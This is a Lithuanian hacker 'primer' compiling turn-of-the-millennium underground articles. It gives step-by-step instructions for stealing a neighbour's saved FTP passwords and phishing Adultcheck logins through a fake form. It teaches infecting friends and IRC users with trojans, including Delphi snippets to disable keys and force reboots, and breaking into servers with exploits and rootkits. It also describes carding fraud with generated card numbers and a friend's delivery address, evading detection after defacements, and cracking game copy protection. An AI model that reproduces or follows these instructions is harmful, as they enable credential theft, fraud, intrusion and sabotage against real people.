Hakerio Pradziamokslis

“HAKERIO PRADŽIAMOKSLIS”

Kevino Mitniko idėjos nemirė. Visų šalių Hakeriai vienykites.Įsivaduokime iš Matricos gniaužtų….

Straipsniai surinkti iš lietuviškų hakerių svetainių. Speciali padėka autoriams

Turinys:

1. Access Aproved2. Mazhas Adultcheck ID gavimo tutorialas3. Kaip anonimizuotis ir bandyti likti nepastebetam…4. Proxy5. Trojos arkliukai arba kaip jie veikia? 6. Hackingas ir cardingas ZHALIEMS7. Pasirasyk savo CGI maileri 8. Coll www9. CRACK10. UNIX Cracking 11. Delphi12. Freecell for Windows 98 SE krekinimas13. Domenas dykai 14. FTP totorial`as15. FTP Tutorial 216. Taksofonai zhaliems 17. Ouestbook hack18. Hackeriai pries crackerius19. Internet Hack20. Keletas irc pamokeliu21. Kaip nesielgti hakinant22. Kaip tapti hakeriu 23. Kaip veikia trojanai24. KREDITINES KORTELES25. L0phtCrack v2.5 krekinimas26. Linux tutorialas naujokams27. Laikinas LINUX tinklas namie28. HACKERIO MANIFESTAS29. mIRC bug’s

30. mIRC invisibility 31. mIRC’o slaptybez32. NAMEZERO33. Linux Naujokams 34. UNIX Naujokams35. Nmap’o panaudojimas hack’o tikslais36. NMAP (2)37. Paranoja arba kaip neikliuti 38. Kaip Palikti Inicialus Nulauzhtoje Programoje39. Trumpai apie PGP 40. Proxy 41. Proxy Adresai 42. REGISTRAS43. Kur pradedančiajam Hakeriui ieškoti info?44. Serverio nukepimas45. Servisai 46. Shell dykai 47. TCP/IP totorial`as 48. Toniniai signalai telefonijoje49. Technologinio andegraundo atstovu tipologija50. Trashing 51. Trashingas 252. trOJAN REMOVAL53. Web crack54. XOR- sifravimo metodas 55. Kaip nucrackin’ti WinZip 7.0

1. Access Aproved

Senais gerais laikais, kada 486 buvo dievu kompas, zhmones kurie naudodavosi tinklo paslaugomis passwordus galvodavo tokius kaip ‘sex’,’fuck’,’peace’ ir t.t. Tada shiuolaikinis hackeris tikrai galejo ramiai tokiais passwordais pasinaudoti. Kartais Tokiu kvileliu pasitaiko ir dabar, kurie vitoj passwordo rasho savo varda, pavarde ar dar ka nors, kas susije su juo. Kartais uzhtenka nueiti i koki http://superhacker.hypermart.net ir pazhiurejus i skiltele “apie mane” galima rasti passworda. Na kaip minejau, tokiu dabar vienetai, bet vis del to pasitaiko… Kad to ishvengti mums ishvengtume savo accountuose mums reikia susigalvoti tinkama passworda, kurio hackeris neatspes nei speliodamas, nei paleides brute force. Shtai keletas taisykliu:

1. Niekada negalvok passwordu, tokiu kaip tavo vardas, pavarde ir t.t.2. Passwordas turi buti sudarytas ish nemazhiau kaip 6-7 simboliu. Ish ju turi buti kaichiai, didzhiosios bei mazhosios raides.3. Niekada nespausk ant accountu loginu esanchiu skyreliu “Save my password”4. Niekada neishsaugok passwordu savo PC visokiose passwords.txt (Tam yra galva, jei nera tai tau shakes :)5. Niekada kiekvienam atskiram accountui nekartok to paties passwordo, nes jei suzhinos viena zhinos ir visus kitus.

Tai keletas patarimu. O kaip nulauzhti tuos gudruolius, kurie shiuos patarimus jau senai zhino ir ju laikosi? Na, jie tikrai gudrus, bet mes gudresni :). Tarkim mes priejome prie kaimyno kompo, kuriame yra instaliuotas CuteFTP, o shi programa buvo naudota kaimyno saitui aplaudinti. Ka mes darome? Aishku einame i C:Program filesCuteFTP (gali buti ir kur nors kitur). Pirma suzhinokime esamos programos versija. Tarkim kaimynas turi CuteFTP v2.5. Ten tirkai bus toks failiukas kaip SMDATA.DAT, kuris ir saugo visus naudojamus FTP adresus, username’us bei beabejo passwordus, kurie buna uzhshifruoti nesunkia shifruote. Ta failiuka mes netychia isimetame i savo senai paruoshta floopy, ir su piktdzhiugishka shypsena neshates ji namo. Namie, pasiemes alaus buteli nusikopijuojat parsineshta faila i savo cuteFTP ta pachia versija. Jusu bus paklausta ar norite irashyti atneshta faila ant virshaus, tad spauskite ‘Yes’. Dabar pasileidzhiame savaji CteFTP ir matome , kad atsirado nauju adresu, kuriu tu ankschiau neturejai. Dabar belieka prisijungti prie vieno ish kaimyno accountu ir ka su juo darysi tai jau tavo reikalas. Bet vis del to tai dar ne pabaiga! Tarkim tu nori kaimyna dar labaiu nuliudinti ir pakeisti jo passwordo. Pazhiurejes i accounto propertys matai, kad vietoj passworda yra irashyta kazhkokia fuflo ‘*****’. Ne beda! Tam yra visokios programos. Viena ish ju Snet Boys revelation, kuri turi pointeri, su kuriuo uzhejus ant ***** pasirodo tikras passwordas. Viskas! Tik zhiurek kad negautum nuo kaimyno i galva, uzh visokiu bjaurybiu pripaishyma jo puslpyje ;).

Dar ka norechiau priminti: Ne shtai keletas CuteFTP versiju bei failu, kuruose laikomi ju passwordia:

HOSTS.DAT – CuteFtp V. 1.xTREE.DAT – CuteFtp V. 2.xSMDATA.DAT – CuteFtp V. 2.5/2.6

Ir nepamirshk, kad ne tik shi programa turi tokiu failu. Turi ir kitos, tau tereikia juos surasti!

Sekmes!

2. Mazhas Adultcheck ID gavimo tutorialas

Adultchecko ID gavimas yr labai paprastas… 🙂

1.Atsidaryk Hotmailo ar usa.net emailo akaunta (pvz.hotmail@hotmail.com)

2.Naudodamasis nauju emailu atsidryk geocities akaunta

3.Susirask tikra Adultchecko saita ir nusikopijuok jo koda

4.Pakeisk taikini ish adultcheck.cgi (ar kas ten bebutu) i www.geocities.com/tavo_vartotojo_vardas.cgi – Ka shitai duoda? Ogi ishsiunchia nieko neitarinchios aukos duomenis, ivestus i forma (pvz. ju adultcheck ID) i geocities cgi bin kuris redirektina juos i hotmail@hotmail.com.

5.Nukreipk auka i TIKRA adultchecko ID puslapi po to kai jis bus ivedes info..jiems tai atrodys kaip kox keistas nesusipratimas (dauguma windoze vartotoju yra priprate prie to ir negalvos apie tai dar karta.. netgi jei ir pagalvos, tai bus jau velu).

6.Ikishk savo nauja puslapi kur nors,tinka bet kur, netgi tavo geocities akauntas tix, tik nekishk jo i pirma puslapi – jame geriau tix kox nors “hi im mike.. I’m 15 and this is my first homepage!! isn’t it kewl!!” ir prispausdink visokio meshlo geocities kopams.

7.Viliok zhmones i savo saita… ir Valio! dabar tu esi ishdidus autentishku adultchecko ID ir passwordu savininkas…

Kelios mintys pamastymui…

Visada naudok proxy ar wingata nustatinedamas ar ieidinedamas i savoakauntus. Juk tu nenori palikti savo realaus IP bet kur, jei del kokios nors priezhasties jie noretu tave susekti.

Niekad nedek netikro puslapio savo IPT serveryje…tai papraschiausiai kvaila.

Bandydamas ivilioti potencialias aukas i savo saita, NIEKADA nesiusk spamoi tokius newsgroupus kaip alt.hackers ir t.t. pasilik tai alt.sex ir panashiammeshlui…

Galiausiai, apdenk savo klaviatura plastiku, apvyniok klavishus, kad pirshtaineliptu..ir nepaliktu pirshtu atspaudu.

Have Fun

pagal

ThePsykoPublic Enemy #7“God told me to skin you alive”http://prozac.iscool.net

medzhiaga paruoshe Winter Wolf.

3. Kaip anonimizuotis ir bandyti likti nepastebetam…

By Craft[Eye] // http://www.underground.lt // CraftEye@gmx.net

Kai kurios savokos ir terminai:Provider – interneto tiekejas(kaip takas)

Proxy – serveris per kuri galima jungtis norint pasiekti puslapi ir t.t.(jis padidina shansus likti nesugautam)

Logas – textinis failas kuriame saugoma visa prisijungimo, siuntimo, gavimo ir panashi informacija.

IP – na paaishkinsiu aishkiau – kiekvienas kompas turi ip sudaryta ish x.x.x.x kur 0 <= x <= 255, pagal shi skaiciu galima suzhinoti daug informacijos apie prisijungimo vieta, provaideri ir t.t..

PGP(Pretty Good Privacy) – vienas ish populiariausiu informacijos kodavimo budu.

Intro

Visu pirma ash esu gaves kelis klausymus kaip “kaip NEANONIMISHKAI nuhakinti sajta?”. Manau tikrai geras klausymas =].Ir ir ji lengva atsakyti. Jei nori nuhakinti saita ir likti pastebetas tau tiesiog reikes atsijungti visus proxy ir t.t. Ir eini prie kokio taikinio ir lauzhi. Bet kas ish to? Ka tai duos… Manau daug esmes hake yra ne tame kad shoostrai defeisisni sajta, o kad liksi nepastebetas… Nors shiais laikas yra labai sunku tai padaryti, visi provaideriai veda logus ir t.t. Na bet pameginti verta ar ne?

Kodel tau reikia saugotis?

Na pirma nuo 2000.01.01 isheis istatymas ir tada jau tu nebegalesi laisvai eiti per visus guestbookus, forumus, web boardus ir deti visu skriptus neuzhsidejas ne proxy. Antra ar tau patinka, kai kas nors skaito tavo laishkus? Manau ne. Shtai kodel anonimishkumas nedrysiu sakyti hakeriui, bet zhmogu kuris jauchia kad zhino shiek tiek daugiau uzh kitu yra labai svarbus dalykas.

Asmenybe

Niekada neishduok savo tikro vardo(na vardas nesvarbu, nors jeigu tavo vardas koks Aldevinas, o toki ash tik viena savo mieste zhinaw tai gali atitinkamai padeti tam tikriems zhmonems), amzhiaus(principo reikalas), pavardes. Manau duoti savo adresa kokiam neaishkiam zhmogui IRC ar dar kur yra ishvis didelis absurdas. Manau visi turetu buti private virtualiame pasaulyje. Heh atsiminkite, kad IRC butu lengva jus surasti, jei rekaujate pilna gerkle kokia tavo pavarde + pazhiureje /dns ar /whois gali pamatyti *!*@vln.dialup.takas.lt ar da ka nors turbut visiems aishku ish kur tu, o dar kai reki kokiam kanale ash Jonas Jonaitis ir t.t. Savo draugam gali pasakyti tik varda, nes esu mates pora atveju IRC kaip ei Jonai Jonaiti varysi i infobalt, taigi draugai irgi gali buti pavojingi buti.

Nickas

Nevartok to pachio nicko hackuose ir IRC. Nes tada jau lengvoka bus tave atsekti, kaip sakant STT =] darbuotojui reikes pasedeti kanale, susidraugauti su tavim ir jau tada… Na aishku jei ruoshiesi daryti, ka nors kokiam draugelio puslapiui tada manau nereikes keisti nicko, bet jei ka nors rimtai, tai tada geriau saugokis. Na jei aishku tavo draugelio tevas ne koks telekomo direktoriaus pavaduotojas.

Nickas ir ne tik IRC

Heh ish praktikos sakau – padefeisina kas sajta ir kisha i forumus hpc puslapiuose DEFACE by ME ir t.t. Manau, kad tai irgi neapgalvotas zhingsnis, nes jei neatseks tuo momentu kai hakinai puslapi ish logu atseks per forumus tavo ip(netgi yra forumuose ivairiuose moderatoriams opcija show ip, o per ju sourcus perejus ar adminam laishka parashius tikrai ip suzhinos, manau nemazhai kas). Jei reksi gerkle visuose forumuose ir wwwboarduose tai ishlysi i pavirshiu ir t.t. Cha kas sake, kad adminai nesilanko HPC puslapuose? =] Kaip tave gali pagauti?

Ooo simple. Kai kada adminai tiks ispeja, jei nesiliausite imsimes priemoniu ir t.t. Chia geri adminai, blogi adminai kartais uzhsiima tavimi rimtai. Na o kaip jie tave pagauna, chia paprasta kiekvienas provaideris veda logus, jei jungiesi per proxy(apie tai veliau) jie gauna jo IP adresa. Na loguose dazhnai buna narshykles, pashto programos ar pan. versija, LAN kortos numeris, pribumbasiu visokiu – bet svarbiausia ip adresas. Paprasciausia situacija – tu nupyliai puslapi, adminas susinervina, pasizhiuri logus – aha tako ip numeriai, gerai. Pasiima savo mobilu ir surenka koki telekomo telefona > tai padaro 3 val(jei neklystu ne 100% informacija) begyje > tada telekomo dedez pasako telefona ir adresa ant kurio uzhregistruotas telefonas. Kaip jau sakiau geras adminas paskambins ir ispes tave, blogas adminas paprashys telekomo, kad atjungtu tau telefona – shis taip ir padarys, o jei dar skolu uzh telefona turejai – viskas. Ir sedek zhmogus be telefono, kaip akmens amzhiuje. Chia tik pavyzdys… Jei jungsies per proxy, tada adminas parashys draugishka laishka proxy savininkam, jei negaus logo duomenu tada adminas pasakys, kad rimtas reikalas pateiks irodymus ir panashiai, tada proxy davininkas isako adminam duoti duomenis… Tada pamato blogasis adminas, kad per proxy jungtasi ish dial-up, tada jau istorija kartojasi…

4. Proxy

Na papraschiausias budas paslepti savo ip adresatai jungtis per proxy. Visur kur jus lankysites : kaip jau minejau forumuose, wwwboarduose ir t.t. bus rodomas proxy ip. Tai labai smarkiai nepadidins galimybes buti nepagautam, bet shiaip del nekalto browsinimo tai labai naudinga. Kaip konfiguruoti jusu IE,NETSCAPE ar OPERA rekomentuosiu… Tai gana lenga(susirasit patys kaip sakant). Shiaip proxy naudoja du portus 80 ir 8080. Proxy adresas dazhniausiai atrodo taip : proxy.anonimyzer.com ar panashiai. Proxy hakui nera taip pat saugu del jau minetu priezhaschiu. Geriausiai daryti proxy grandine turiu omeni pvz: dial-ip > proxy1.bmw.com > proxy3.audi.com > proxy2.stt.com =] ir paashiai, na bet chia reikes sugebeti padaryti… O tada jau adminam bus sunkiau atsekti tave, jie painiuosis(kuo daugiau proxy tuo geriau). Dar viena nezhymi detale > tik nenaudok skirtingu proxy nuo vieno providerio > kaip proxy.5ci.lt > proxy1.5ci.lt ir t.t. Zhodzhiu proxy bootinas…

E-mail

Apie laishkus trumpai. Jei nenori, kad provideris skaitytu tavo pashto ir pan. Papraschiausiai koduok juos. Yra dabar visokie PGP(Pretty Good Privacy) plachiau www.pgp.com. Gali aishku su draugu sugalvoti savo kalba ir t.t. =]] Na menka, bet reikshminga detale > nenaudok provaideriu savojeshalyje. Jie tikrai supras tau rashomu laishku turini. O jau provaideriai uzhsienije, kokioje Japonijoje ar USA/CANADA niekas tikrai nesupras lietuviu kalbos > nereiks nei PGP:). Be to uzhsienio meilai patogesni ir galingesni nei Lietuvos provideriu(musu mylimas puslapiukas www.takas.lt :).

Pabaigai

Zhodzhiu chia aptariau tik kelis budus kaip apsisaugoti ir kaip tave gali pagauti, bei zhinoma svarbiausia, kad nejaustum baimes, kad tavo laishkus skaito koks nors adminas ir juokiasi :). Kaip sakoma atsargiausias – mobiliausias ar kaip ten. Shiaip manau ishpuikimas ir norejimas parodyti save labai PADIDINA shansus, kaip buti sugautam. Ir smarkiai. Ir jei nori parekti koks ash esu ir kad ash sajta “padariau” tai pasiroopink anonimishkumu. Manau ir be to turi galva ir pasiroopinsi anonimishkumu ir nereksi kur papuola “HACKED”. O poto adminas sakys you’re FUCKED… Nu chia lyrinis nukripimas. Zhodzhiu pagalvokite priesh darydami… Last Message: Anonimas yra niekas, nes jo papraschiausiai nera…

Original text by Craft[Eye] // CraftEye@gmx.net2000(c) Special for www.underground.lt nu jus supratot ane?

5. Trojos arkliukai arba kaip jie veikia?

Trojos arkliukai (arba kaip jie veikia)Turbūt daugelis iš jūsų žino kas yra trojanai. Bet ne visi žino kaip jie veikia. Jei hackeris nenutuokia kas yra IP arba portai tegu verčia kitą puslapį. Jei ne, tai kaip sakoma – važiuojam :).

Daugelis iš jūsų turbūt yra žaidę su trojanu(įsivaizduoju vargšo lamerio veidą, kai jam atsidarinėja cd-rom’as ir kaip jis bėga pas kanors pagalbos arba kiša diskelį su 1990 metų Dr.Web :)) Visų pirmą, jie dirba tinklu, dažniausiai TCP/IP protokolu, nes jis popiuliaraiusias juo sukasi Inetas, ir kad kitas žmogus būtų “užsikrėtęs” Trojos arkliuku jam reikia jį gauti ir paleisti. Žmones dažniausiai gauna trojaną e-muilu arba IRC – čia populiariausi būdai (na žinoma tu gali nueiti pas savo draugeli ir pasakyti va čia geras geimas nori? Geras draugas žinoma neatsisako – po tris kartus paleisto “žaidimo” tu jam pasakai, kad turbūt sugedo diskelis! :)) Kai tik paleidi Trojos ponį, jis tuoj perkopijuoja save į C:Windows ir t.t., įsirašo savo paleidėją į kokią nors sisteminę vietelę – rejestrą, kokį nors sisteminį failą(win.ini ir pan.), gudresni išvis gerai daro – susikuria tokį failą su plėtiniu *.VxD(Virtual Extended Driver ar pan.:)) ir nukopijuoja failiuką į c:WindowsSystem, o toliau kai kompas kraunasi Windozai tiesiog “paleidžia” visus *.VxD failiukus. O tada musų draiveris jau paleidžia išsvajotąjį trojaną:). Pusę darbo jau atlikta(jei aišku pas auką nėra ten kokio Norton Doktor Vebas 3000 Milenium Super Profesional Special Edition 😉 – bet ir tai kaikada nepadeda, jei geras trojanas:)). Lieka sužinoti aukos IP – čia jau kaip iš bobutės rankinę atimti(kai kuriais atvėjais). Jei niusiuntei trojaną mIRC’u, tai tiesiog parašai /dns to_kuriam_nusiuntei_trojana_nikas – ir parašo tau jo IP, jei paštu sunkiau – bet kai kurie poniai siunčia IP adresą į pasirinkt’a muilą, jei tu nori pažaist su draugelio kompu – run kortelėje parašai winipcfg(jei WinNt tai – wintipcfg:)). Sužinai jo IP /valio/ paleisk savo kompe vadinamąjį Remote Control’a (tik netą dalį su siurprizas.exe), o tą dalį su kuria valdysi aukos kompą. Ten būna toks laukelis IPHost ar dar kas nors – įrašai skaičiukus arba host vard’a – pvz 0.0.0.0(IP adresą, o ne savo gimimo datą kaip esi pripratęs daryti kai pildai anketą dėl nemokamo cd :)) Spaudi mykoliuką konekt ir jei parašo “succesfuly connected to 0.0.0.0” ar panašiai – tada jau prasideda:). Jau gali būti BEVEIK įsitikinęs kad žaisi su kažkieno kompu. Kodėl beveik? Todėl, kad serveris ar dar kas nors gali būti password protected(pvz senasis NetBus trojanas sugeba prisijungti prie savo serverio, gali gauti failų sąrašą, bet kai bandai trinti failiuka win.com 🙂 arba atidaryti cd-rom NetAutobusas sako kad serverio kompas apsaugotas nuo redagavimo su password’u ar kokia programa:( ). Bet jei jau sugebėjai prisijungti, 9 atvėjais 10 tu jau naujasis kompo adminas :)). O įvairių trojanų galimybės neregėtos:1. Valdai kompo failų sistemą.2. Valdai rejestrą.3. Kontroliuoji visus įrenginius(gali net atspauzdinti tekstą “hi lama” su aukos printeriu, jei jis įjungtas arba valdomas programiniu būdu t.y. neturi on/off mygtuko :)).4. Gali peržiūrinėti ekrano vaizdą ir paspausti mygtuką su užrašu X lamos ekrane :).5. Jei jis dirba kokiame nors WinWord gali jam tiesiai į jo redaguojamą vietą parašyti kokį eilėraštuką.6. Gauti password’us :).7. Įrašinėti jo renkamą tekstą klaviaturoje(nebijokite negausi jokių ************* vietoje freexxxvideos :))))).8. Ir išvis daryti ką nori.Ir dar daug daug įvairių galimybių. Bent aš asmeniškai rekomenduoju “ten” ikišti kokius 4-3 trojanus ir tada išvis jėga(juk visi Trojos arkliukai skirtingi). Beje trojanai dažniausiai naudoja WinApi funkcijas(tokias kaip ExitWindowsEx() – jos tinka bet kokiai programavimo kalbai nuo Asemblerio iki VC++ ir Delphi, nes jas realizuoja ne programa, o Windozai, jas tik reikia iškviesti :)). Galiu pademonstruoti kelias jų, jei bandysite patys daryti savo trojaną(pavyzdžiai Delphi sintaks, bet tikram hackeriui juk nesunku išversti iškalbos į kalbą, jei kalba ne kokia VC++ ir ją verti į Asmeblerį:)) kaip duomenys perduosi tinklu- tavo reikalas, o kaip badaryti kelis triukus aš tau parodysiu: Pavyzdžiui reikia perkelti kursoriu į kitą vietą:SetCursorPos(x ašies kordinatė,y ašies kordinatė) – apie x,y mokeisi mokykloj, jei ne bandyk įdomesnį variantą :Randomize; SetCursorPos(Random(Screen.Width),Random(Screen.Height));Efektas nuostabus. Perkels kursorių į betkurią ekrano vietą:). Nori perkrauti kompą, išjungti – jokių problemų:ExitWindowsEx(flagas,0); vietoje žodžio flagas rašyk:Jei nori perkrauti kompą – EWX_REBOOT, išjungti – EWX_POWEROFF, atsijungti nuo esamo vartotojo – EWX_LOGOFF. Va, visa artilerija :).Ką dar įdomaus galima padaryti hmm pagalvokime… Sugalvojau – paleisti programą :WinExec(‘programos pavadinimas’,1); Tos kabutės reikalingos ;)Beje mano pirmojo trojano pagrindinė funkcija buvo paleisti 1000 notepad’ų. Skamba paprastai, bet vaizdas nepakartojamas:). Jei nori ko nors įdomesnio – prašau, sisteminių klavišų atjungimas:

PROCEDURE TurnSystemKeysOff;VARdummy: INTEGER;BEGINSystemParametersInfo(97, INTEGER(TRUE), @Dummy, 0);END;

Taip pat galėsi juos ir įjungti:

PROCEDURE TurnSystemKeysOn;VARdummy: INTEGER;BEGINSystemParametersInfo(97, INTEGER(FALSE), @Dummy, 0)END ;Na dabar aukai galėsi padaryti tikrai cirką, jis vargšas metysis į šalis – jam ekrane vien notepad’ai, negana to kursorius mėtosi į visas šalis(kaip jis kryžiuką paspaus?:)), jo vienintelė viltis Ctrl + Alt + Del ir taip uždaryti visus notepad’us – bet kas gi čia neveikia nei vienas sisteminis klavišas lieka viena išeitis perkrauti “su protu susipykiusią, kvailą mašiną” , bet jam ir vėl vargti nereikės – kompas staiga pats persikrauna – viskas jis formatuoja hard’a. 🙂 Linksma ar ne? Aš irgi taip manau.Manai, kad trojanai labai piktas dalykas – iš dalies taip. Kai supranti kaip jie veikia jį lengviau pašalinti, bei supranti jo keliamą pavoju tavo kompiuteriui! Beje Trojos poniai gali ir pasitarnauti – yra žmonių kurie adminisruoja nutolusius kompus su trojanais.Ir dar – jei patys nenorit, tingit rašyti savo trojanų parsisiūskit kokius 5 ir susiraskit aukų. Trojanų pilna internete. Aš rekomenduočiau SubSeven gold ar dar kokį iš tos serijos(mano mylimiausias), taip pat DeepThroat 3,1 ar naujesnę versiją vertėtų parsisiųsti. Na kaip nepaminėsi senbuvių – BO2k(Back Oriface 2000) ir NetBus Pro. Dar yra įvairių įvairiausių. Manau pilniausią jų sarašą galit peržiūrėti galite Web puslapyje http://www.tlsecurity.net/amt.htm ten yra pilnas daugelio trojanų aprašymas ir būdai kaip jį panaikinti :).Na ką draugai hackeriai aš su jumis. Jei ką rašykit! Tikiuosi straipsnis patiko! Jei ne, ką padarysi ne visiem įtiksi, jei ką rašykit man į muilą.IKI Gero Hack’o! Craft[Eye] – CraftEye@gmx.lt

6. Hackingas ir cardingas ZHALIEMS

Sitam texte pateikiami *TIK* pagrindai . Tai visai nereishkia, kad jie gali buti visursekmingai panaudoti . Ash(autorius) neatsakau uzh jokia zhala, kuria JUS pridarysitenaudodami shia medzhiaga . Ash neskatinu nei isilauzhimu nei cardingo ir nereishkiakad ash tuo uzhsijimu jei rashau toki texta .

1.Hakingas

1.1.Serveriu hakingas

Serveriu hakingas susideda ish keliu etapu :

1.Portu skanavimasSiunciami paketai i tam tikra serveri ir ieshkoma atidaru portu . Skaneriai gali butipadaryti per cgi (RI7S toolzai) ar veikti tiesiai jusu kompe . Yra skaneriu beveik visomssistemoms . Vienas gereusiu ant UNIX tipo sistemu(linux,minix,AIX,SunOS)veikianciu skaneriu yra nmap (www.insecure.org) . Yra skaneriu ir ant win9x bei winNT betjie yra labai ribotu galimybiu, bet savo funkcija atlieka .2.Servisu aptikimas pagal portusTam yra servisu pagal portus sarashai bet ir be ju daug kam zhinoma, kad pvz WWW servai eina ant 80 porto .3.Servisu serveriu versiju nustatymasReikia telnetintis i tam tikra porta . Jei nemokat(?), tai i FTP(21 portas) galit prisiko-nektint naudodami paprashciausia FTP client’a ir jum dazniausiai parashys versija .4.Exploitu tom versijom ieshkojimasNu susirandat ir uzhrashot visu servisu versijas ir puolat ieshkot exploitu inete . Nu galit eiti i astalavista.box.sk(ar www.av.com) ir rasykit “exploits” gal surasit saitakuri pamegsit . O gal jau toki turit . Nu sheip keli exploitai yra mano megstamam lietuvishkam saite ri7s.cjb.net . Bet ten yra tikrai ne visi exploitai .5.ExploitinimasTada imat ir konkektinates prie savo linux shell’o ir kompiliuojat exploita . Yra ir komplieriu ant windows bet ash tuo nesidomejau . Jei neturit shell’o nueikit(Klaipedoj) i KU ir jums tikrai duos . Jei gyvenat kitam mieste tai galit prashyt kietesniupazhystamu . Zhodzhiu cia jusu reikalas kaip susikompailint …6.BackdoorinimasInstaliuojat koki rootkita priesh tai pasidomeje juo(RTFM) . Galit koki noritkita trojana ajshku . Nu pasiieshkokit .

Nu jau ir turit access ant serverio . Gal eggdrop’u statyt nepulkit, bet … =]

1.2.Windoze peremimas ( Ce apie access ant windoze kurio owneris yra 101% lamah . Kitaip neveix :[ )

Tai wo . Imat kokia progshe . Nu trojana . Surandat SERVER dali bet jos nepaleidzhiat,o ikishat kokiam lamah . Placiau : Susitinkat per IrC ir sakot : “ei xebrantas !Ar tik nenori hakeriu but ??? Imk zhek cia galesi isilausht i kompus su tokia programa ! “=] Lamah paima jusu SERVER’i . Executina . Jus executinat CLIENT trojano dali ir konek-tinaties prie lamoz . Tada siulyciau i sisteminius failus ivaryti koki kita trojana . Nu cia reikalinga todel, kad jei pirma trojana suras . Nu yra tokios programeles kuriu anti-virus negaudo . Jos nevadinamos TROJANAIS o gali buti panaudotos tam . Oficialiai ir trojanaivadinasi REMOtE ADMINISTRATION toolz . Taigi ieshkokit komerciniu toolz’u crack’inkit …

Keli patarimai : neikit savo niku, naudokit proxy ir raukites tik ant 24/7/365 access’a prieineto turinciu kompu .

2.Cardingas (*DEMESIO* sita draudzhia lietuvos istatymai)

1.Imat netscape ir instaliuojat2.Paleidziat3.Susirandat WWW proxy kruva .4.Sukonfiginat kad veiktu per proxy grandine (proxy.ktu.lt:8080//proxy.com:81//proxy.jp ir paskutinio serverio porta porto vietoj) . Uzh tai ash dekingas vienam xebrantui kurio zhinutepastebejau RI7S BB .5.Imat CC# generatoriu ir darot CC# .6.Konektinates prie saito kuriam zhadat pirkt .7.Susitariat su draugeliu, kad nesakys niekam, kad pas ji atejo kokia preke .8.Rashot savo varda ir pavarde, CC#, draugelio adresa tikra . 9.Zhiurit kad prekiu verte nevirshytu 700Lt nes nereikia muito moket iki ~tiek .10.Laukiat prekiu ir niekam nesake pasiimat is draugo dezhutes cheki nueinat i pashtair pasiimat preke .11.Jei kas, draugas sako kad nieko nebuvo ir kad jis taves nepazhysta .

Taigi kolkas viskas, bet kaip zhaliems turetu uzhtekt tokio gaido .

Written in 2000/07 by jogis

7. Pasirasyk savo CGI maileri

Manau daugelis noretu moketi padaryti cgi pasto programa, ar ka nors panasaus, kas dirba su socketais. Zemiau pateikiu su komentarais gabaleli skripto, kuris siuncia email`a.

############## Duomenys gauti is formos ########### $from=$FORM{‘from’}; $to=$FORM{‘to’}; $subj=$FORM{‘subj’}; $msg=$FORM{‘msg’}; ###################################################

($x,$x,$x,$x, $here) = gethostbyname($null); ($x,$x,$x,$x, $there) = gethostbyname($smtp_server); $thisserver = pack(‘S n a4 x8’,2,0,$here);

########### Priespaskutinis kintamasis- konstanta yra portas (25) $remoteserver = pack(‘S n a4 x8’,2,25,$there);

############## Kuriam soketa ####################### (!(socket(S,2,1,6))) && (&error(“SMTP EMAIL: Connect error! socket”)); ############## subindinam ########################## (!(bind(S,$thisserver))) && (&error(“SMTP EMAIL: Connect error! bind”)); ############## konektinames su serveriu ############ (!(connect(S,$remoteserver))) && (&error(“SMTP EMAIL: connection to $smtp_server has failed!”));

################# parenkam/ sukeiciams deskriptorius select(S); $| = 1; select(STDOUT);

################ skaitom soketo (serverio) ir tikrinam ar nera klaidu $DATA_IN = ; ($DATA_IN !~ /^220/) && (&error(“SMTP EMAIL: data in Connect error – 220”));

################### toliau viskas vyksta ################# ################### paprasciausiai perdavinejan ################# ################### smtp servui komandas ################# print S “HELO tavo_hostasrn”; $DATA_IN = ; ($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: data in Connect error – 250”));

print S “MAIL FROM: $fromn”; $DATA_IN = ; ($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: $emailfrom address not valid”));

print S “RCPT TO: $ton”; $DATA_IN = ; ($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: $recipient address not valid”));

print S “DATAn”; $DATA_IN = ; ($DATA_IN !~ /^354/) && (&error(“SMTP EMAIL: Message send failed – 354”));

print S <; ($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: Message send failed – try again – 250”));

print S “QUITn”;

8. Coll www

Pasidaryk šustrą puslapi Pasidarei shustra puslapi? Apie ka jis? Nuogas merginas, mashinas, kompiuterius, ju lauzhyma… Na nesvarbu. Svarbu, kad tavo www yra geras ir todel tau reikes ji patalpinti geoj vietoj ( kalbu ne apie kuno daly :). Internetas dabar prikimshtas visokiu redirektu, vietu puslapiams bei kitu patogiu dalykeliu. Shiame straipsnyje ash papasakosiu kaip atsikratyti daugelio nervinanchiu baneriu, kur patalpinti savo puslapi, kur gauti gera redirekta ir net kaip uzh veltuj gauti DOMANA! Pradekime nuo patalpinimo… Shtai tarkim hypermart.net. Duoda tau adresa “vardas.hypermart.net”. Galesi siusti 20 megu, bet kiekvienam tavo puslapyje metys labai nervinanti baneri, kurio labai paprasta atsikratyti.

9. CRACK

Sitame tutoriale, as jums parodysiu kaip nulauzti, CD apsauga, naudojant Win32Dasm ir Hiew.

Na ka, pradedam:Visu pirma, jus privalote paleisti ta zaidima, kuri jus norite nulauzti, be CD. Na aisku zaidimas nepasileis, (Prasau tik nepanikuokite:), viskas, ka jus pamatysite tai, isokanti lanaga kuris pranesa “gera naujiena”. Na ka si zinute tai tikrai gera naujiena, nes ji mums ir pades patvarkyti ta nelemta zaidima, taigi viskas ka jus siuo metu turite atsiminti, tai ta zinute, kuri jums pranese, kad reikalingas CD. Pavyzdziui: Please insert the – CD, arba: You need the CD to play the *** .( ***, yra zaidimo pavadinimas, kuri jus norite nucrackinti). Beje jei jus esate su ribotu atminties kiekiu savo galvoje, ir nesugebate atsiminti sios zinutes kuri praso CD, tai uzsirasykite ja, ant kokio nors popiergalio. Taigi dabar pasileiskite Win32Dasm, ir atsiradusiame lange paspauskite DISASSEMBLE, po to isokusiame meniu, pasirinkite OPEN FILE TO DISSASSEMBLE. Atsiras kitas langas, kuriame jus turesite susirasti to zaidimo exe faila, kuri norite nucrackinti. Kai tai atliksite, prades begti tokia eilute, taigi tai ustruks kelias minutes, taigi siulau pramankstinti savo kojeles ir patraukti kur karaliai pesti vaiksto:).

